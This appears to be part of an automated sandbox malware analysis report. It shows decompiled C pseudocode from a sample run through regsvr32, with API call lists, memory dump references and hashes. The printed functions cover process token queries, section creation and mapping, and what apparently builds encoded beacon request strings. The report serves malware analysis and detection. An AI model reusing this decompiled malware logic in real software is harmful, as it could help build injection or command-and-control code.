                                                                                                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                                                                                                    			E023E83B7(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E023E2049(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E023E9039(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                                                                                                                                                                                                    0x023e83c4
                                                                                                                                                                                                                                    0x023e83c5
                                                                                                                                                                                                                                    0x023e83c6
                                                                                                                                                                                                                                    0x023e83c7
                                                                                                                                                                                                                                    0x023e83c8
                                                                                                                                                                                                                                    0x023e83cc
                                                                                                                                                                                                                                    0x023e83d3
                                                                                                                                                                                                                                    0x023e83e2
                                                                                                                                                                                                                                    0x023e83e5
                                                                                                                                                                                                                                    0x023e83e8
                                                                                                                                                                                                                                    0x023e83ef
                                                                                                                                                                                                                                    0x023e83f2
                                                                                                                                                                                                                                    0x023e83f5
                                                                                                                                                                                                                                    0x023e83f8
                                                                                                                                                                                                                                    0x023e83fb
                                                                                                                                                                                                                                    0x023e8406
                                                                                                                                                                                                                                    0x023e8408
                                                                                                                                                                                                                                    0x023e8411
                                                                                                                                                                                                                                    0x023e8419
                                                                                                                                                                                                                                    0x023e841b
                                                                                                                                                                                                                                    0x023e842d
                                                                                                                                                                                                                                    0x023e8437
                                                                                                                                                                                                                                    0x023e843b
                                                                                                                                                                                                                                    0x023e844a
                                                                                                                                                                                                                                    0x023e844e
                                                                                                                                                                                                                                    0x023e8457
                                                                                                                                                                                                                                    0x023e845f
                                                                                                                                                                                                                                    0x023e845f
                                                                                                                                                                                                                                    0x023e8461
                                                                                                                                                                                                                                    0x023e8461
                                                                                                                                                                                                                                    0x023e8469
                                                                                                                                                                                                                                    0x023e846f
                                                                                                                                                                                                                                    0x023e8473
                                                                                                                                                                                                                                    0x023e8473
                                                                                                                                                                                                                                    0x023e847e

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 023E83FE
                                                                                                                                                                                                                                    • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 023E8411
                                                                                                                                                                                                                                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 023E842D
                                                                                                                                                                                                                                      • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 023E844A
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,0000001C), ref: 023E8457
                                                                                                                                                                                                                                    • NtClose.NTDLL(?), ref: 023E8469
                                                                                                                                                                                                                                    • NtClose.NTDLL(00000000), ref: 023E8473
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2575439697-0
                                                                                                                                                                                                                                    • Opcode ID: d1c4a03039c7f7f3a46e883db1714025550170b71c063c955fff14f7774bb033
                                                                                                                                                                                                                                    • Instruction ID: 405be1f0d922d55a8b4bff728c24d19a0fc926cec1fc05d2c49629f94812d61b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1c4a03039c7f7f3a46e883db1714025550170b71c063c955fff14f7774bb033
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E52107B1A40228FBDF219F95CC45ADEBFBDEF18744F104422F901AA1A0D7719A599FA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 026D1EB5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                    			E026D1EB5(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E026D1D9F(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                                                                                                                                                                                                                    0x026d1ebe
                                                                                                                                                                                                                                    0x026d1ec5
                                                                                                                                                                                                                                    0x026d1ec6
                                                                                                                                                                                                                                    0x026d1ec7
                                                                                                                                                                                                                                    0x026d1ec8
                                                                                                                                                                                                                                    0x026d1ec9
                                                                                                                                                                                                                                    0x026d1eda
                                                                                                                                                                                                                                    0x026d1ede
                                                                                                                                                                                                                                    0x026d1ef2
                                                                                                                                                                                                                                    0x026d1ef5
                                                                                                                                                                                                                                    0x026d1ef8
                                                                                                                                                                                                                                    0x026d1eff
                                                                                                                                                                                                                                    0x026d1f02
                                                                                                                                                                                                                                    0x026d1f09
                                                                                                                                                                                                                                    0x026d1f0c
                                                                                                                                                                                                                                    0x026d1f0f
                                                                                                                                                                                                                                    0x026d1f12
                                                                                                                                                                                                                                    0x026d1f17
                                                                                                                                                                                                                                    0x026d1f52
                                                                                                                                                                                                                                    0x026d1f19
                                                                                                                                                                                                                                    0x026d1f1c
                                                                                                                                                                                                                                    0x026d1f22
                                                                                                                                                                                                                                    0x026d1f27
                                                                                                                                                                                                                                    0x026d1f2b
                                                                                                                                                                                                                                    0x026d1f49
                                                                                                                                                                                                                                    0x026d1f2d
                                                                                                                                                                                                                                    0x026d1f34
                                                                                                                                                                                                                                    0x026d1f42
                                                                                                                                                                                                                                    0x026d1f42
                                                                                                                                                                                                                                    0x026d1f2b
                                                                                                                                                                                                                                    0x026d1f5a

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76D24EE0,00000000,00000000,?), ref: 026D1F12
                                                                                                                                                                                                                                      • Part of subcall function 026D1D9F: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,026D1F27,00000002,00000000,?,?,00000000,?,?,026D1F27,00000002), ref: 026D1DCC
                                                                                                                                                                                                                                    • memset.NTDLL ref: 026D1F34
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Section$CreateViewmemset
                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                    • API String ID: 2533685722-2766056989
                                                                                                                                                                                                                                    • Opcode ID: ee04d3b80f2aa96c2028224801f0ff00ef799990c629de64b363f9b0c8c139ed
                                                                                                                                                                                                                                    • Instruction ID: b6354e8d599e187b35d57fe35b05ac32902bafa565a033ddf4af7008bb975c43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee04d3b80f2aa96c2028224801f0ff00ef799990c629de64b363f9b0c8c139ed
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23210BB1D0020DAFDB11DFA9C8849EEFBF9EB48354F108469E615F3210D7709A498B64
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 026D1D9F, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                    			E026D1D9F(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                                                                                                                                                                                                                    0x026d1db1
                                                                                                                                                                                                                                    0x026d1db7
                                                                                                                                                                                                                                    0x026d1dc5
                                                                                                                                                                                                                                    0x026d1dcc
                                                                                                                                                                                                                                    0x026d1dd1
                                                                                                                                                                                                                                    0x026d1dd7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d1dd8
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,026D1F27,00000002,00000000,?,?,00000000,?,?,026D1F27,00000002), ref: 026D1DCC
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: SectionView
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1323581903-0
                                                                                                                                                                                                                                    • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                    • Instruction ID: 60242d72cacc72b8b5d41660c6166a99184d30469634c887c0b9de140eb21b6d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0F012B590420CBFDB119FA5CC85C9FBBBDEB45258B104979B152E1090D6709E098A60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E8B94, Relevance: 33.2, APIs: 22, Instructions: 245memorystringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                                                    			E023E8B94(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t101;
				signed int _t105;
				char** _t107;
				int _t110;
				signed int _t112;
				intOrPtr* _t113;
				intOrPtr* _t115;
				intOrPtr* _t117;
				intOrPtr* _t119;
				intOrPtr _t122;
				intOrPtr _t127;
				int _t131;
				CHAR* _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t144;
				int _t145;
				void* _t146;
				intOrPtr _t147;
				void* _t149;
				long _t153;
				intOrPtr* _t154;
				intOrPtr* _t155;
				intOrPtr* _t158;
				void* _t159;
				void* _t161;

				_t144 = __edx;
				_t135 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x23ed018; // 0x99d5691b
				asm("bswap eax");
				_t61 =  *0x23ed014; // 0x3a87c8cd
				_t133 = _a16;
				asm("bswap eax");
				_t62 =  *0x23ed010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x23ed00c; // 0x62819102
				asm("bswap eax");
				_t64 =  *0x23ed27c; // 0x28da5a8
				_t3 = _t64 + 0x23ee633; // 0x74666f73
				_t145 = wsprintfA(_t133, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0x23ed02c,  *0x23ed004, _t59);
				_t67 = E023E1C1A();
				_t68 =  *0x23ed27c; // 0x28da5a8
				_t4 = _t68 + 0x23ee673; // 0x74707526
				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
				_t161 = _t159 + 0x38;
				_t146 = _t145 + _t71; // executed
				_t72 = E023E54BC(_t135); // executed
				_t134 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t127 =  *0x23ed27c; // 0x28da5a8
					_t7 = _t127 + 0x23ee8eb; // 0x736e6426
					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
					_t161 = _t161 + 0xc;
					_t146 = _t146 + _t131;
					HeapFree( *0x23ed238, 0, _v8);
				}
				_t73 = E023E7649();
				_v8 = _t73;
				if(_t73 != 0) {
					_t122 =  *0x23ed27c; // 0x28da5a8
					_t11 = _t122 + 0x23ee8f3; // 0x6f687726
					wsprintfA(_t146 + _a16, _t11, _t73);
					_t161 = _t161 + 0xc;
					HeapFree( *0x23ed238, 0, _v8);
				}
				_t147 =  *0x23ed32c; // 0x4cc95b0
				_t75 = E023E9395(0x23ed00a, _t147 + 4);
				_t153 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					RtlFreeHeap( *0x23ed238, _t153, _a16); // executed
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x23ed238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x23ed238, _t153, _v20);
						goto L26;
					}
					E023E7A80(GetTickCount());
					_t82 =  *0x23ed32c; // 0x4cc95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x23ed32c; // 0x4cc95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x23ed32c; // 0x4cc95b0
					_t149 = E023E8307(1, _t144, _a16,  *_t88);
					_v28 = _t149;
					asm("lock xadd [eax], ecx");
					if(_t149 == 0) {
						L24:
						HeapFree( *0x23ed238, _t153, _v8);
						goto L25;
					}
					StrTrimA(_t149, 0x23ec2ac);
					_push(_t149);
					_t94 = E023E3CC8();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x23ed238, _t153, _t149);
						goto L24;
					}
					_t154 = __imp__;
					 *_t154(_t149, _a4);
					 *_t154(_v8, _v20);
					_t155 = __imp__;
					 *_t155(_v8, _v16);
					 *_t155(_v8, _t149);
					_t101 = E023E809F(0, _v8);
					_a4 = _t101;
					if(_t101 == 0) {
						_v12 = 8;
						L21:
						E023EA1B0();
						L22:
						HeapFree( *0x23ed238, 0, _v16);
						_t153 = 0;
						goto L23;
					}
					_t105 = E023E43DF(_t134, 0xffffffffffffffff, _t149,  &_v24); // executed
					_v12 = _t105;
					if(_t105 == 0) {
						_t158 = _v24;
						_t112 = E023E163F(_t158, _a4, _a8, _a12); // executed
						_v12 = _t112;
						_t113 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
						_t115 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t115 + 8))(_t115);
						_t117 =  *((intOrPtr*)(_t158 + 4));
						 *((intOrPtr*)( *_t117 + 8))(_t117);
						_t119 =  *_t158;
						 *((intOrPtr*)( *_t119 + 8))(_t119);
						E023E9039(_t158);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t107 = _a8;
							if(_t107 != 0) {
								_t150 =  *_t107;
								_t156 =  *_a12;
								wcstombs( *_t107,  *_t107,  *_a12);
								_t110 = E023E85DB(_t150, _t150, _t156 >> 1);
								_t149 = _v28;
								 *_a12 = _t110;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E023E9039(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}






















































                                                                                                                                                                                                                                    0x023e8b94
                                                                                                                                                                                                                                    0x023e8b94
                                                                                                                                                                                                                                    0x023e8b94
                                                                                                                                                                                                                                    0x023e8b9f
                                                                                                                                                                                                                                    0x023e8ba6
                                                                                                                                                                                                                                    0x023e8ba8
                                                                                                                                                                                                                                    0x023e8ba8
                                                                                                                                                                                                                                    0x023e8bb5
                                                                                                                                                                                                                                    0x023e8bc0
                                                                                                                                                                                                                                    0x023e8bc3
                                                                                                                                                                                                                                    0x023e8bc8
                                                                                                                                                                                                                                    0x023e8bd1
                                                                                                                                                                                                                                    0x023e8bd4
                                                                                                                                                                                                                                    0x023e8bd9
                                                                                                                                                                                                                                    0x023e8bdc
                                                                                                                                                                                                                                    0x023e8be1
                                                                                                                                                                                                                                    0x023e8be4
                                                                                                                                                                                                                                    0x023e8bf0
                                                                                                                                                                                                                                    0x023e8bfd
                                                                                                                                                                                                                                    0x023e8bff
                                                                                                                                                                                                                                    0x023e8c05
                                                                                                                                                                                                                                    0x023e8c0a
                                                                                                                                                                                                                                    0x023e8c15
                                                                                                                                                                                                                                    0x023e8c17
                                                                                                                                                                                                                                    0x023e8c1a
                                                                                                                                                                                                                                    0x023e8c1c
                                                                                                                                                                                                                                    0x023e8c23
                                                                                                                                                                                                                                    0x023e8c29
                                                                                                                                                                                                                                    0x023e8c2c
                                                                                                                                                                                                                                    0x023e8c2f
                                                                                                                                                                                                                                    0x023e8c34
                                                                                                                                                                                                                                    0x023e8c41
                                                                                                                                                                                                                                    0x023e8c43
                                                                                                                                                                                                                                    0x023e8c49
                                                                                                                                                                                                                                    0x023e8c53
                                                                                                                                                                                                                                    0x023e8c53
                                                                                                                                                                                                                                    0x023e8c55
                                                                                                                                                                                                                                    0x023e8c5c
                                                                                                                                                                                                                                    0x023e8c5f
                                                                                                                                                                                                                                    0x023e8c62
                                                                                                                                                                                                                                    0x023e8c67
                                                                                                                                                                                                                                    0x023e8c74
                                                                                                                                                                                                                                    0x023e8c76
                                                                                                                                                                                                                                    0x023e8c84
                                                                                                                                                                                                                                    0x023e8c84
                                                                                                                                                                                                                                    0x023e8c86
                                                                                                                                                                                                                                    0x023e8c94
                                                                                                                                                                                                                                    0x023e8c99
                                                                                                                                                                                                                                    0x023e8c9d
                                                                                                                                                                                                                                    0x023e8ca0
                                                                                                                                                                                                                                    0x023e8e63
                                                                                                                                                                                                                                    0x023e8e6d
                                                                                                                                                                                                                                    0x023e8e76
                                                                                                                                                                                                                                    0x023e8ca6
                                                                                                                                                                                                                                    0x023e8cb2
                                                                                                                                                                                                                                    0x023e8cba
                                                                                                                                                                                                                                    0x023e8cbd
                                                                                                                                                                                                                                    0x023e8e57
                                                                                                                                                                                                                                    0x023e8e61
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e8e61
                                                                                                                                                                                                                                    0x023e8cc9
                                                                                                                                                                                                                                    0x023e8cce
                                                                                                                                                                                                                                    0x023e8cd7
                                                                                                                                                                                                                                    0x023e8ce8
                                                                                                                                                                                                                                    0x023e8cec
                                                                                                                                                                                                                                    0x023e8cf5
                                                                                                                                                                                                                                    0x023e8cfb
                                                                                                                                                                                                                                    0x023e8d0a
                                                                                                                                                                                                                                    0x023e8d11
                                                                                                                                                                                                                                    0x023e8d1a
                                                                                                                                                                                                                                    0x023e8d20
                                                                                                                                                                                                                                    0x023e8e4b
                                                                                                                                                                                                                                    0x023e8e55
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e8e55
                                                                                                                                                                                                                                    0x023e8d2c
                                                                                                                                                                                                                                    0x023e8d32
                                                                                                                                                                                                                                    0x023e8d33
                                                                                                                                                                                                                                    0x023e8d3a
                                                                                                                                                                                                                                    0x023e8d3d
                                                                                                                                                                                                                                    0x023e8e41
                                                                                                                                                                                                                                    0x023e8e49
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e8e49
                                                                                                                                                                                                                                    0x023e8d46
                                                                                                                                                                                                                                    0x023e8d4d
                                                                                                                                                                                                                                    0x023e8d55
                                                                                                                                                                                                                                    0x023e8d5a
                                                                                                                                                                                                                                    0x023e8d63
                                                                                                                                                                                                                                    0x023e8d69
                                                                                                                                                                                                                                    0x023e8d70
                                                                                                                                                                                                                                    0x023e8d77
                                                                                                                                                                                                                                    0x023e8d7a
                                                                                                                                                                                                                                    0x023e8e79
                                                                                                                                                                                                                                    0x023e8e2d
                                                                                                                                                                                                                                    0x023e8e2d
                                                                                                                                                                                                                                    0x023e8e32
                                                                                                                                                                                                                                    0x023e8e3d
                                                                                                                                                                                                                                    0x023e8e3f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e8e3f
                                                                                                                                                                                                                                    0x023e8d84
                                                                                                                                                                                                                                    0x023e8d8b
                                                                                                                                                                                                                                    0x023e8d8e
                                                                                                                                                                                                                                    0x023e8d93
                                                                                                                                                                                                                                    0x023e8d9e
                                                                                                                                                                                                                                    0x023e8da3
                                                                                                                                                                                                                                    0x023e8da6
                                                                                                                                                                                                                                    0x023e8dac
                                                                                                                                                                                                                                    0x023e8db2
                                                                                                                                                                                                                                    0x023e8db8
                                                                                                                                                                                                                                    0x023e8dbb
                                                                                                                                                                                                                                    0x023e8dc1
                                                                                                                                                                                                                                    0x023e8dc4
                                                                                                                                                                                                                                    0x023e8dc9
                                                                                                                                                                                                                                    0x023e8dcd
                                                                                                                                                                                                                                    0x023e8dcd
                                                                                                                                                                                                                                    0x023e8dd9
                                                                                                                                                                                                                                    0x023e8de5
                                                                                                                                                                                                                                    0x023e8de9
                                                                                                                                                                                                                                    0x023e8deb
                                                                                                                                                                                                                                    0x023e8df0
                                                                                                                                                                                                                                    0x023e8df2
                                                                                                                                                                                                                                    0x023e8df7
                                                                                                                                                                                                                                    0x023e8dfc
                                                                                                                                                                                                                                    0x023e8e09
                                                                                                                                                                                                                                    0x023e8e11
                                                                                                                                                                                                                                    0x023e8e14
                                                                                                                                                                                                                                    0x023e8e14
                                                                                                                                                                                                                                    0x023e8df0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e8ddb
                                                                                                                                                                                                                                    0x023e8ddf
                                                                                                                                                                                                                                    0x023e8e16
                                                                                                                                                                                                                                    0x023e8e19
                                                                                                                                                                                                                                    0x023e8e22
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e8e22
                                                                                                                                                                                                                                    0x023e8de1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e8de1
                                                                                                                                                                                                                                    0x023e8dd9

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 023E8BA8
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 023E8BF8
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 023E8C15
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 023E8C41
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 023E8C53
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 023E8C74
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 023E8C84
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 023E8CB2
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 023E8CC3
                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(04CC9570), ref: 023E8CD7
                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(04CC9570), ref: 023E8CF5
                                                                                                                                                                                                                                      • Part of subcall function 023E8307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,73FCC740,?,?,023EA428,?,04CC95B0), ref: 023E8332
                                                                                                                                                                                                                                      • Part of subcall function 023E8307: lstrlen.KERNEL32(?,?,?,023EA428,?,04CC95B0), ref: 023E833A
                                                                                                                                                                                                                                      • Part of subcall function 023E8307: strcpy.NTDLL ref: 023E8351
                                                                                                                                                                                                                                      • Part of subcall function 023E8307: lstrcat.KERNEL32(00000000,?), ref: 023E835C
                                                                                                                                                                                                                                      • Part of subcall function 023E8307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,023EA428,?,04CC95B0), ref: 023E8379
                                                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000000,023EC2AC,?,04CC95B0), ref: 023E8D2C
                                                                                                                                                                                                                                      • Part of subcall function 023E3CC8: lstrlen.KERNEL32(04CC87FA,00000000,00000000,73FCC740,023EA453,00000000), ref: 023E3CD8
                                                                                                                                                                                                                                      • Part of subcall function 023E3CC8: lstrlen.KERNEL32(?), ref: 023E3CE0
                                                                                                                                                                                                                                      • Part of subcall function 023E3CC8: lstrcpy.KERNEL32(00000000,04CC87FA), ref: 023E3CF4
                                                                                                                                                                                                                                      • Part of subcall function 023E3CC8: lstrcat.KERNEL32(00000000,?), ref: 023E3CFF
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 023E8D4D
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,?), ref: 023E8D55
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 023E8D63
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 023E8D69
                                                                                                                                                                                                                                      • Part of subcall function 023E809F: lstrlen.KERNEL32(?,00000000,023ED330,00000001,023E2200,023ED00C,023ED00C,00000000,00000005,00000000,00000000,?,?,?,023E96C1,023E23E9), ref: 023E80A8
                                                                                                                                                                                                                                      • Part of subcall function 023E809F: mbstowcs.NTDLL ref: 023E80CF
                                                                                                                                                                                                                                      • Part of subcall function 023E809F: memset.NTDLL ref: 023E80E1
                                                                                                                                                                                                                                    • wcstombs.NTDLL ref: 023E8DFC
                                                                                                                                                                                                                                      • Part of subcall function 023E163F: SysAllocString.OLEAUT32(?), ref: 023E1680
                                                                                                                                                                                                                                      • Part of subcall function 023E163F: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 023E1702
                                                                                                                                                                                                                                      • Part of subcall function 023E163F: StrStrIW.SHLWAPI(?,006E0069), ref: 023E1741
                                                                                                                                                                                                                                      • Part of subcall function 023E9039: HeapFree.KERNEL32(00000000,00000000,023E7F18,00000000,?,?,00000000), ref: 023E9045
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?), ref: 023E8E3D
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 023E8E49
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,04CC95B0), ref: 023E8E55
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 023E8E61
                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,?), ref: 023E8E6D
